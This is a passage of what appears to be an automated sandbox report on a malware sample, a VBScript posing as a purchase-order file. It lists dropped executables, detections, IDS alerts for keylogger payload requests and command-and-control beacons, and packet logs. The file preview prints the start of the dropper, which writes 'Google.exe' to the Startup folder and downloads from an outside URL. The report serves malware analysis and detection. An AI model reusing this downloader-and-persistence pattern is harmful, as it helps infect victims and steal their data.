                                                                                                                                                                                  SSDEEP:192:QuY+pHkfpPr76TWiu0FPZK3rcd5kM7f+ihdCF3EiRcx+NSt0ckBCecUSaFUH:ZZpEhSTWi/ekfzaVNg0c4gU
                                                                                                                                                                                  MD5:7426F318A20A187D88A6EC88BBB53BAF
                                                                                                                                                                                  SHA1:4F2C80834F4B5C9FCF6F4B1D4BF82C9F7CCB92CA
                                                                                                                                                                                  SHA-256:9AF85C0291203D0F536AA3F4CB7D5FBD4554B331BF4254A6ECD99FE419217830
                                                                                                                                                                                  SHA-512:EC7BAA93D8E3ACC738883BAA5AEDF22137C26330179164C8FCE7D7F578C552119F58573D941B7BEFC4E6848C0ADEEF358B929A733867923EE31CD2717BE20B80
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_Google.exe

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe
                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1432064
                                                                                                                                                                                  Entropy (8bit):7.20532961543164
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24576:Z4lavt0LkLL9IMixoEgea2A08ob7xV6+SXq8iMPRNhJNcbq9MmCS:okwkn9IMHea2A07SXq6zMaPCS
                                                                                                                                                                                  MD5:DF6FA61AC1509C2D8B720690829D5634
                                                                                                                                                                                  SHA1:4430A5461B9C0B5FB8AD0398EDAD7B5E89159441
                                                                                                                                                                                  SHA-256:90520E67BFFE18505E7D77356A0ADBF8AB6663862EF765387EEAF6E2CE5A32D6
                                                                                                                                                                                  SHA-512:4F953EAD572C92BDE737227C1AFA88BC2D274118E42C99E9245405B4748FA0F258CA8B334ECF219E5C7D2ADBBF9185CA4CBBDCC5EF312C26AA7E81BD32D0610C
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 87%
                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.............g.........$.............%....H......X.2........q)..Z..q).....q).......\....q).....Rich...........................PE..L....._g.........."..................k............@..........................@......%.....@...@.......@.....................lk..|....@..TE...................... l..................................p'..@...............X............................text...t........................... ..`.rdata..j...........................@..@.data...4........b..................@....rsrc...TE...@...F..................@..@.reloc..b............4..............@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BBLXFG.lnk

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\._cache_Google.exe
                                                                                                                                                                                  File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Icon number=4, Archive, ctime=Mon Dec 30 09:50:53 2024, mtime=Mon Dec 30 09:50:53 2024, atime=Mon Dec 30 09:50:53 2024, length=1432064, window=hide
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1805
                                                                                                                                                                                  Entropy (8bit):3.4104856446858958
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24:8hw/7v5+ePQeqIPxARbFh3rE2+s9T4IlY3Bm:8m/7vnQPIadLbr9MIlg
                                                                                                                                                                                  MD5:7C60517FA8CEF495FEB0F4771CD70D1F
                                                                                                                                                                                  SHA1:A74D79C6B44C2A31B4CF1A6B0570236C6D31DF7C
                                                                                                                                                                                  SHA-256:E237DD53CBCE4EDD3EEDAEE596EE898DFB6DB41C977E83CA84F89545850FE5CB
                                                                                                                                                                                  SHA-512:22912F1A852252CEC358F4F63FAAF857C86FD52E13E896DAAABF58E25C8CDFB241DDE156D7259C78FAB217E86166931ECFA9493DED442144B0CBF4A18B70E90E
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:L..................F.@.. .....U..Z....Z..Z....Z..Z............................:..DG..Yr?.D..U..k0.&...&......vk.v....ie...Z..P\...Z......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.YVV...........................%..A.p.p.D.a.t.a...B.V.1......YTV..Roaming.@......CW.^.YTV...........................s..R.o.a.m.i.n.g.....V.1......Y[V..Windata.@......Y[V.Y[V..........................c..W.i.n.d.a.t.a.....`.2......Y[V .TXAASJ.exe..F......Y[V.Y[V.........................Oy..T.X.A.A.S.J...e.x.e.......`...............-......._...........%.uG.....C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe..!.....\.....\.....\.....\.....\.W.i.n.d.a.t.a.\.T.X.A.A.S.J...e.x.e.).".C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.W.i.n.d.a.t.a.\."...C.:.\.W.i.n.d.o.w.s.\.S.y.s.W.O.W.6.4.\.s.h.e.l.l.3.2...d.l.l.........%SystemRoot%\SysWOW64\shell32.dll...............................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Windows\System32\wscript.exe
                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):2203648
                                                                                                                                                                                  Entropy (8bit):7.056405744702409
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:49152:ZnsHyjtk2MYC5GDqkwkn9IMHea2A07SXq6zMaPCSO:Znsmtk2acdnV+FSvPCt
                                                                                                                                                                                  MD5:38D3095D1B748CD53C65395718D7C5F4
                                                                                                                                                                                  SHA1:3C0221471B641A641A9141A731F6EE09663E6538
                                                                                                                                                                                  SHA-256:F3724BF49BFD8D11EF1F81B4C6AEBC4D3281CECFA357D4FB3AE388A4ADD242E6
                                                                                                                                                                                  SHA-512:F0AB6ED5DFA52D8159C5090FD96087BA8E89C26C2FDB90FAE3F4D19B6952250ECD49846B9198D7C77AFFB6FABE3A0E53758392409A73552B202591433AFC03E6
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                  • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Google.exe, Author: Joe Security
                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                                                                                  Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@..........................."..................@..............................B*......0....................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...0...........................@..P....................................@..P........................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Roaming\Windata\TXAASJ.exe

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\._cache_Google.exe
                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1432064
                                                                                                                                                                                  Entropy (8bit):7.20532961543164
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24576:Z4lavt0LkLL9IMixoEgea2A08ob7xV6+SXq8iMPRNhJNcbq9MmCS:okwkn9IMHea2A07SXq6zMaPCS
                                                                                                                                                                                  MD5:DF6FA61AC1509C2D8B720690829D5634
                                                                                                                                                                                  SHA1:4430A5461B9C0B5FB8AD0398EDAD7B5E89159441
                                                                                                                                                                                  SHA-256:90520E67BFFE18505E7D77356A0ADBF8AB6663862EF765387EEAF6E2CE5A32D6
                                                                                                                                                                                  SHA-512:4F953EAD572C92BDE737227C1AFA88BC2D274118E42C99E9245405B4748FA0F258CA8B334ECF219E5C7D2ADBBF9185CA4CBBDCC5EF312C26AA7E81BD32D0610C
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 87%
                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S.............g.........$.............%....H......X.2........q)..Z..q).....q).......\....q).....Rich...........................PE..L....._g.........."..................k............@..........................@......%.....@...@.......@.....................lk..|....@..TE...................... l..................................p'..@...............X............................text...t........................... ..`.rdata..j...........................@..@.data...4........b..................@....rsrc...TE...@...F..................@..@.reloc..b............4..............@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\Documents\DTBZGIOOSO\XZXHAVGRAG.xlsm

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  File Type:Microsoft Excel 2007+
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):18387
                                                                                                                                                                                  Entropy (8bit):7.523057953697544
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
                                                                                                                                                                                  MD5:E566FC53051035E1E6FD0ED1823DE0F9
                                                                                                                                                                                  SHA1:00BC96C48B98676ECD67E81A6F1D7754E4156044
                                                                                                                                                                                  SHA-256:8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
                                                                                                                                                                                  SHA-512:A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:PK..........!...5Qr...?.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-..@.5.....(..8...-.[.g.......M^..s.5.4.I..P;..!....r....}._.G.`....Y....M.7....&.m1cU..I.T.....`.t...^.Bx..r..~0x....6...`....reb2m.s.$.%...-*c.{...dT.m.kL]Yj.|..Yp..".G.......r...).#b.=.QN'...i..w.s..$3..)).....2wn..ls.F..X.D^K.......Cj.sx..E..n._ ....pjUS.9.....j..L...>".....w.... ....l{.sd*...G.....wC.F... D..1<..=...z.As.]...#l..........PK..........!..U0#....L......._rels/.rels ...(...............

                                                                                                                                                                                  C:\Users\user\Documents\DTBZGIOOSO\~$XZXHAVGRAG.xlsx

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):165
                                                                                                                                                                                  Entropy (8bit):1.4377382811115937
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:KVC+cAmltV:KVC+cR
                                                                                                                                                                                  MD5:9C7132B2A8CABF27097749F4D8447635
                                                                                                                                                                                  SHA1:71D7F78718A7AFC3EAB22ED395321F6CBE2F9899
                                                                                                                                                                                  SHA-256:7029AE5479F0CD98D892F570A22B2AE8302747DCFF3465B2DE64D974AE815A83
                                                                                                                                                                                  SHA-512:333AC8A4987CC7DF5981AE81238A77D123996DB2C4C97053E8BD2048A64FDCF33E1245DEE6839358161F6B5EEA6BFD8D2358BC4A9188D786295C22F79E2D635E
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:.user ..j.o.n.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                                                                                                                  C:\Users\user\Documents\DTBZGIOOSO\~$cache1

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):771584
                                                                                                                                                                                  Entropy (8bit):6.638013190381294
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9ICXr:ansJ39LyjbJkQFMhmC+6GD9x
                                                                                                                                                                                  MD5:ACA4D70521DE30563F4F2501D4D686A5
                                                                                                                                                                                  SHA1:6C2BAA72EA5D08B6583893B01001E540213F4AAF
                                                                                                                                                                                  SHA-256:449B6A3E32CEB8FC953EAF031B3E0D6EC9F2E59521570383D08DC57E5FFA3E19
                                                                                                                                                                                  SHA-512:DA806BD4AC02C45C17ED5D050428B3E7B15E8F148ACB156CFB41EAB3E27C35FA91AB1A55D18C6EF488A82D3379ABF45421432E2EFAF2FAE4968C760D42215A7C
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                  • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\Users\user\Documents\DTBZGIOOSO\~$cache1, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\Documents\DTBZGIOOSO\~$cache1, Author: Joe Security
                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                                                                                  Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................&....................@.......................... ...................@..............................B*...........................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                                                                                                                                                                  C:\Users\user\Documents\HTAGVDFUIE.xlsm

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  File Type:Microsoft Excel 2007+
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):18387
                                                                                                                                                                                  Entropy (8bit):7.523057953697544
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
                                                                                                                                                                                  MD5:E566FC53051035E1E6FD0ED1823DE0F9
                                                                                                                                                                                  SHA1:00BC96C48B98676ECD67E81A6F1D7754E4156044
                                                                                                                                                                                  SHA-256:8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
                                                                                                                                                                                  SHA-512:A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:PK..........!...5Qr...?.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0.E.H.C.-..@.5.....(..8...-.[.g.......M^..s.5.4.I..P;..!....r....}._.G.`....Y....M.7....&.m1cU..I.T.....`.t...^.Bx..r..~0x....6...`....reb2m.s.$.%...-*c.{...dT.m.kL]Yj.|..Yp..".G.......r...).#b.=.QN'...i..w.s..$3..)).....2wn..ls.F..X.D^K.......Cj.sx..E..n._ ....pjUS.9.....j..L...>".....w.... ....l{.sd*...G.....wC.F... D..1<..=...z.As.]...#l..........PK..........!..U0#....L......._rels/.rels ...(...............

                                                                                                                                                                                  C:\Users\user\Documents\~$HTAGVDFUIE.xlsx

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):165
                                                                                                                                                                                  Entropy (8bit):1.4377382811115937
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:KVC+cAmltV:KVC+cR
                                                                                                                                                                                  MD5:9C7132B2A8CABF27097749F4D8447635
                                                                                                                                                                                  SHA1:71D7F78718A7AFC3EAB22ED395321F6CBE2F9899
                                                                                                                                                                                  SHA-256:7029AE5479F0CD98D892F570A22B2AE8302747DCFF3465B2DE64D974AE815A83
                                                                                                                                                                                  SHA-512:333AC8A4987CC7DF5981AE81238A77D123996DB2C4C97053E8BD2048A64FDCF33E1245DEE6839358161F6B5EEA6BFD8D2358BC4A9188D786295C22F79E2D635E
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:.user ..j.o.n.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                                                                                                                  C:\Users\user\Documents\~$cache1

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):771584
                                                                                                                                                                                  Entropy (8bit):6.638013190381294
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9ICXr:ansJ39LyjbJkQFMhmC+6GD9x
                                                                                                                                                                                  MD5:ACA4D70521DE30563F4F2501D4D686A5
                                                                                                                                                                                  SHA1:6C2BAA72EA5D08B6583893B01001E540213F4AAF
                                                                                                                                                                                  SHA-256:449B6A3E32CEB8FC953EAF031B3E0D6EC9F2E59521570383D08DC57E5FFA3E19
                                                                                                                                                                                  SHA-512:DA806BD4AC02C45C17ED5D050428B3E7B15E8F148ACB156CFB41EAB3E27C35FA91AB1A55D18C6EF488A82D3379ABF45421432E2EFAF2FAE4968C760D42215A7C
                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                  • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\Users\user\Documents\~$cache1, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\Documents\~$cache1, Author: Joe Security
                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                                                                                  Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................&....................@.......................... ...................@..............................B*...........................P...............@..!............@......................................................CODE............................... ..`DATA....T........0..................@...BSS......................................idata..B*.......,..................@....tls.........0...........................rdata..9....@......................@..P.reloc.......P......................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                                                                                                                                                                  C:\Windows\appcompat\Programs\Amcache.hve

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                  File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):1835008
                                                                                                                                                                                  Entropy (8bit):4.4656330360850065
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:6144:vIXfpi67eLPU9skLmb0b4iWSPKaJG8nAgejZMMhA2gX4WABl0uN9dwBCswSb8:AXD94iWlLZMM6YFHf+8
                                                                                                                                                                                  MD5:856BE935774398776284A1532147C817
                                                                                                                                                                                  SHA1:56D487552E49D752DE7081D80485600196D90F2B
                                                                                                                                                                                  SHA-256:41C35DC6CC6CF9ED46E53CEA2EAEBBE26B4641A50CD9922A9F121C59C1DB1CAF
                                                                                                                                                                                  SHA-512:7F7C7C0FE5DBCE26513C28349C3A02415C49311211B113B10A1856CA38CE3B96EA7142C9F75BB9B47E95930383FD008625E9C6192E944074EAFA111B35D3E479
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.....Z..............................................................................................................................................................................................................................................................................................................................................._..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                  Static File Info

                                                                                                                                                                                  General

                                                                                                                                                                                  File type:assembler source, ASCII text, with CRLF line terminators
                                                                                                                                                                                  Entropy (8bit):5.524165823376839
                                                                                                                                                                                  TrID:
                                                                                                                                                                                    File name:Open Purchase Order Summary Details-16-12-2024.vbs
                                                                                                                                                                                    File size:643 bytes
                                                                                                                                                                                    MD5:3611c7e36499135086695c11f2898395
                                                                                                                                                                                    SHA1:b77dff01a77538f9cdcc86dbb45138f5b9da63b9
                                                                                                                                                                                    SHA256:01e6f507f507e2093552b08d51a575f106bb818cd6f32e2d158543f66d2a11a0
                                                                                                                                                                                    SHA512:2023cf992575aa300967d6ca949aea665ccf9ce0235084bf1e143ebb2678f5657d37a8a4f6eafeee1cc9e5849014b59285cdadb98552fb93a85506f55672e4cb
                                                                                                                                                                                    SSDEEP:12:qbYhEnsAbs1vWdEV7ws40RCxwVJwzfbeA/GXwmsYRnHJ5xLAaM4vlRQBiajB:gYqvbs1AwLRItDeA/qVvxZM4dSvB
                                                                                                                                                                                    TLSH:A4F0998FC004C5F40A21F77186833808EBA398A87A699336E580E57EA8499B89D441CF
                                                                                                                                                                                    File Content Preview:'<<< Coded By Mr.3amo>>> ..Set QLxVKzQH = CreateObject("WScript.Shell")..HsbInFiD = QLxVKzQH.SpecialFolders("Startup") & "\Google.exe"..'<<<<<<<<<<< code start >>>>>>>>>>>..On Error Resume Next..wscript.sleep 3000..call cepBumIt("https://filedn.com/lp8FEq

                                                                                                                                                                                    File Icon

                                                                                                                                                                                    Icon Hash:68d69b8f86ab9a86

                                                                                                                                                                                    Network Behavior

                                                                                                                                                                                    Suricata IDS Alerts

                                                                                                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                    2024-12-30T11:50:48.868542+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.449753172.111.138.1005552TCP
                                                                                                                                                                                    2024-12-30T11:51:01.761798+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449736142.250.185.206443TCP
                                                                                                                                                                                    2024-12-30T11:51:01.765173+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449737142.250.185.206443TCP
                                                                                                                                                                                    2024-12-30T11:51:02.778748+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449742142.250.185.206443TCP
                                                                                                                                                                                    2024-12-30T11:51:02.794529+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449741142.250.185.206443TCP
                                                                                                                                                                                    2024-12-30T11:51:03.456168+01002849885ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin1192.168.2.449753172.111.138.1005552TCP
                                                                                                                                                                                    2024-12-30T11:51:03.750127+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449747142.250.185.206443TCP
                                                                                                                                                                                    2024-12-30T11:51:03.767397+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449748142.250.185.206443TCP
                                                                                                                                                                                    2024-12-30T11:51:04.894500+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449755142.250.185.206443TCP
                                                                                                                                                                                    2024-12-30T11:51:04.899246+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449756142.250.185.206443TCP
                                                                                                                                                                                    2024-12-30T11:51:05.791355+01002832617ETPRO MALWARE W32.Bloat-A Checkin1192.168.2.44974069.42.215.25280TCP
                                                                                                                                                                                    2024-12-30T11:51:05.791889+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449763142.250.185.206443TCP
                                                                                                                                                                                    2024-12-30T11:51:05.791914+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449762142.250.185.206443TCP
                                                                                                                                                                                    2024-12-30T11:51:06.769671+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449768142.250.185.206443TCP
                                                                                                                                                                                    2024-12-30T11:51:06.772489+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449770142.250.185.206443TCP
                                                                                                                                                                                    2024-12-30T11:51:07.783609+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449772142.250.185.206443TCP
                                                                                                                                                                                    2024-12-30T11:51:07.808354+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449774142.250.185.206443TCP
                                                                                                                                                                                    2024-12-30T11:51:08.753854+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449778142.250.185.206443TCP
                                                                                                                                                                                    2024-12-30T11:51:08.802401+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449779142.250.185.206443TCP
                                                                                                                                                                                    2024-12-30T11:51:09.623549+01002832617ETPRO MALWARE W32.Bloat-A Checkin1192.168.2.44977669.42.215.25280TCP
                                                                                                                                                                                    2024-12-30T11:51:09.754956+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449782142.250.185.206443TCP
                                                                                                                                                                                    2024-12-30T11:51:09.789690+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449783142.250.185.206443TCP
                                                                                                                                                                                    2024-12-30T11:51:10.745496+01002830912ETPRO MALWARE Loda Logger CnC Beacon Response M21172.111.138.1005552192.168.2.449753TCP
                                                                                                                                                                                    2024-12-30T11:51:10.777664+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449787142.250.185.206443TCP
                                                                                                                                                                                    2024-12-30T11:51:10.794931+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449788142.250.185.206443TCP
                                                                                                                                                                                    2024-12-30T11:51:11.773802+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449791142.250.185.206443TCP
                                                                                                                                                                                    2024-12-30T11:51:11.777187+01002044887ET MALWARE Snake Keylogger Payload Request (GET)1192.168.2.449792142.250.185.206443TCP
                                                                                                                                                                                    2024-12-30T11:51:46.003336+01002830912ETPRO MALWARE Loda Logger CnC Beacon Response M21172.111.138.1005552192.168.2.449753TCP
                                                                                                                                                                                    2024-12-30T11:51:51.074024+01002832617ETPRO MALWARE W32.Bloat-A Checkin1192.168.2.45192669.42.215.25280TCP
                                                                                                                                                                                    2024-12-30T11:52:19.273184+01002830912ETPRO MALWARE Loda Logger CnC Beacon Response M21172.111.138.1005552192.168.2.449753TCP
                                                                                                                                                                                    2024-12-30T11:52:52.333217+01002830912ETPRO MALWARE Loda Logger CnC Beacon Response M21172.111.138.1005552192.168.2.449753TCP

                                                                                                                                                                                    Network Port Distribution

                                                                                                                                                                                    TCP Packets

                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                    Dec 30, 2024 11:50:48.891643047 CET49730443192.168.2.423.109.93.100
                                                                                                                                                                                    Dec 30, 2024 11:50:48.891694069 CET4434973023.109.93.100192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:50:48.891789913 CET49730443192.168.2.423.109.93.100
                                                                                                                                                                                    Dec 30, 2024 11:50:48.899504900 CET49730443192.168.2.423.109.93.100
                                                                                                                                                                                    Dec 30, 2024 11:50:48.899533033 CET4434973023.109.93.100192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:50:49.668885946 CET4434973023.109.93.100192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:50:49.669285059 CET49730443192.168.2.423.109.93.100
                                                                                                                                                                                    Dec 30, 2024 11:50:49.718400955 CET49730443192.168.2.423.109.93.100
                                                                                                                                                                                    Dec 30, 2024 11:50:49.718429089 CET4434973023.109.93.100192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:50:49.718862057 CET4434973023.109.93.100192.168.2.4
                                                                                                                                                                                    Dec 30, 2024 11:50:49.718935966 CET49730443192.168.2.423.109.93.100
                                                                                                                                                                                    Dec 30, 2024 11:50:49.720877886 CET49730443192.168.2.423.109.93.100
